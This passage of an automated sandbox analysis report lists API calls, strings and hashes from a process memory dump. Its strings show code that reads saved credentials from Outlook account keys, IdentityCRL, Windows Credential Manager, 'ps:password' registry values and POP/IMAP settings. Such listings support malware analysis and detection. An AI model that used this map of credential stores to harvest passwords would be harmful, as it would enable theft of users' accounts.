                                                              • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                              • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                              • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                              • SetCursor.USER32(00000000), ref: 0040CB35
                                                              • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                              • SetFocus.USER32(?), ref: 0040CB92
                                                              • SetFocus.USER32(?), ref: 0040CC0B
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                              • String ID:
                                                              • API String ID: 1416211542-0
                                                              • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                              • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                              • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                              • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                              • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                              • API String ID: 2360744853-2229823034
                                                              • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                              • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                              • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                              • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                              APIs
                                                              • strchr.MSVCRT ref: 004100E4
                                                              • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                              • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                              • _mbscat.MSVCRT ref: 0041014D
                                                              • memset.MSVCRT ref: 00410129
                                                                • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                              • memset.MSVCRT ref: 00410171
                                                              • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                              • _mbscat.MSVCRT ref: 00410197
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                              • String ID: \systemroot
                                                              • API String ID: 912701516-1821301763
                                                              • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                              • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                              • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                              • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                              APIs
                                                              • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              • memcpy.MSVCRT(?,00456E58,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                              • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                              • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                              • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE$`{g
                                                              • API String ID: 3718511928-4086730951
                                                              • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                              • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                              • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                              • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                              APIs
                                                              • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                              • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                              • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                              • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                              • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                              Strings
                                                              • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                              • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                              • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                              • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FromStringUuid$FreeTaskmemcpy
                                                              • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                              • API String ID: 1640410171-2022683286
                                                              • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                              • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                              • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                              • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
APIs
  • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
• memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
• memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
• memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
• memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
• memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
• memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
Strings
Memory Dump Source
• Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$strlen
• String ID: -journal$-wal$immutable$nolock
• API String ID: 2619041689-3408036318
• Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
• Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
• Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
• Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
APIs
• memset.MSVCRT ref: 00402C9D
  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
• memset.MSVCRT ref: 00402CF7
• sprintf.MSVCRT ref: 00402D10
• sprintf.MSVCRT ref: 00402D4E
  • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
Strings
Memory Dump Source
• Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
Similarity
• API ID: memset$sprintf$Enum
• String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username$`{g
• API String ID: 4097761685-1427485370
• Opcode ID: 869051c230eb502fc44b367a44f21f84098f34e7cd62e2c849a0e400a837e146
• Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
• Opcode Fuzzy Hash: 869051c230eb502fc44b367a44f21f84098f34e7cd62e2c849a0e400a837e146
• Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64
APIs
Strings
Memory Dump Source
• Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
Similarity
• API ID: free$strlen
• String ID:
• API String ID: 667451143-3916222277
• Opcode ID: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
• Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
• Opcode Fuzzy Hash: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
• Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
APIs
• memset.MSVCRT ref: 0040F567
• memset.MSVCRT ref: 0040F57F
  • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
  • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
• memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
• LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
Strings
Memory Dump Source
• Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
Similarity
• API ID: QueryValuememset$AddressFreeLibraryLoadLocalProc_mbscpy_mbsnbcatmemcpy
• String ID: $`{g
• API String ID: 78143705-3824398969
• Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
• Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
• Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
• Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
APIs
  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
• wcslen.MSVCRT ref: 0040874A
• wcsncmp.MSVCRT ref: 00408794
• memset.MSVCRT ref: 0040882A
• memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
• wcschr.MSVCRT ref: 0040889F
• LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
Strings
Memory Dump Source
• Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
Similarity
• API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
• String ID: J$Microsoft_WinInet
• API String ID: 3318079752-260894208
• Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
• Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
• Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
• Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
APIs
• memset.MSVCRT ref: 0040F84A
• RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
• LocalFree.KERNEL32(?), ref: 0040F92C
• RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
Strings
Memory Dump Source
• Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
Similarity
• API ID: ByteCharEnumFreeLocalMultiQueryValueWidememset
• String ID: Creds$`{g$ps:password
• API String ID: 2290531041-361185649
• Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
• Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
• Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
• Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
APIs
• memset.MSVCRT ref: 004037EB
• memset.MSVCRT ref: 004037FF
  • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
• strchr.MSVCRT ref: 0040386E
• _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
• strlen.MSVCRT ref: 00403897
• sprintf.MSVCRT ref: 004038B7
• _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
Strings
Memory Dump Source
• Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
Similarity
• API ID: memset$_mbscpystrlen$memcpysprintfstrchr
• String ID: %s@yahoo.com
• API String ID: 2240714685-3288273942
• Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
• Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
• Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
• Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
APIs
• memcpy.MSVCRT(?,?,?), ref: 004108C3
• CoTaskMemFree.COMBASE(?), ref: 004108D2
• UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
• UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
• memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
• CoTaskMemFree.COMBASE(00000000), ref: 00410970
Strings
• 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
• 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
Memory Dump Source
• Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
Similarity
• API ID: FreeFromStringTaskUuidmemcpy
• String ID: 220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F
• API String ID: 2208953623-202910704
• Opcode ID: 2e7b2f23232dd97abd622906eae07d5a1462dc252c060d9f172839e787d8b35b
• Instruction ID: d39aacb0d07447bcfd979039f79cad875a94fb0475638bd6baea4f5a046d65b4
• Opcode Fuzzy Hash: 2e7b2f23232dd97abd622906eae07d5a1462dc252c060d9f172839e787d8b35b
• Instruction Fuzzy Hash: 6B2192B391411DAAEF11AF61DD40EEF3BACEF15354F004023F956E6211E6B8D981CBA5
APIs
• LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
• GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
• FreeLibrary.KERNEL32(00000000), ref: 00404ADE
• MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
Strings
Memory Dump Source
• Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
Similarity
• API ID: Library$AddressFreeLoadMessageProc
• String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
• API String ID: 2780580303-317687271
• Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
• Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
• Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
• Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
APIs
• LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406CA1
• FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406CBF
• strlen.MSVCRT ref: 00406CCC
• _mbscpy.MSVCRT(?,?,?,00000400,?,00000000,00000000), ref: 00406CDC
• LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406CE6
• _mbscpy.MSVCRT(?,Unknown Error,?,00000400,?,00000000,00000000), ref: 00406CF6
Strings
Memory Dump Source
• Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
Similarity
• API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
• String ID: Unknown Error$netmsg.dll
• API String ID: 2881943006-572158859
• Opcode ID: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
• Instruction ID: bcf62a4d61e6eba693f00c41f459c7331aa1a44f371262b110411e5fdf5e0d86
• Opcode Fuzzy Hash: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
• Instruction Fuzzy Hash: B201DF31609114BBF7051B61EE46F9FBA6CEF49790F20002AF607B1191DA78AE10969C
APIs
  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
• _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
• _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
• GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
  • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
Strings
Memory Dump Source
• Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
Similarity
• API ID: PrivateProfile_mbscpy$AttributesFileString
• String ID: TranslatorName$TranslatorURL$charset$general$rtl
• API String ID: 888011440-2039793938
• Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
• Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
• Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
• Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
APIs
Strings
• unable to open database: %s, xrefs: 0042EBD6
• database is already attached, xrefs: 0042EA97
• cannot ATTACH database within transaction, xrefs: 0042E966
• attached databases must use the same text encoding as main database, xrefs: 0042EAE6
• out of memory, xrefs: 0042EBEF
• too many attached databases - max %d, xrefs: 0042E951
• database %s is already in use, xrefs: 0042E9CE
Memory Dump Source
• Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
Similarity
• API ID: memcpymemset
• String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
• API String ID: 1297977491-2001300268
• Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
• Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
• Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
• Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
APIs
  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
• ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409C53
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 00409C6F
• memcpy.MSVCRT(?,0wE,00000014), ref: 00409C97
• memcpy.MSVCRT(?,0wE,00000010,?,0wE,00000014), ref: 00409CB4
• ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409D3D
• ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 00409D47
• ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409D7F
  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
  • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
  • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
Strings
Memory Dump Source
• Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
• String ID: 0wE$d
• API String ID: 2915808112-1552800882
• Opcode ID: 583de707addaa969329ba30793de7e83f95f566a01afaa3ae0a642996af24538
• Instruction ID: 1be057752684aea17f507b8882d339e9c418a93e0b7bc1648df0d3b0eb18cc96
• Opcode Fuzzy Hash: 583de707addaa969329ba30793de7e83f95f566a01afaa3ae0a642996af24538
• Instruction Fuzzy Hash: B4513B71A01704AFEB24DF29D542B9AB7E4FF88314F10852EE55ADB382DB74E940CB44
                                                              APIs
                                                                • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                              • strchr.MSVCRT ref: 0040327B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringstrchr
                                                              • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                              • API String ID: 1348940319-1729847305
                                                              • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                              • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                              • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                              • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                              APIs
                                                              • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                              • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                              • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                              • API String ID: 3510742995-3273207271
                                                              • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                              • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                              • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
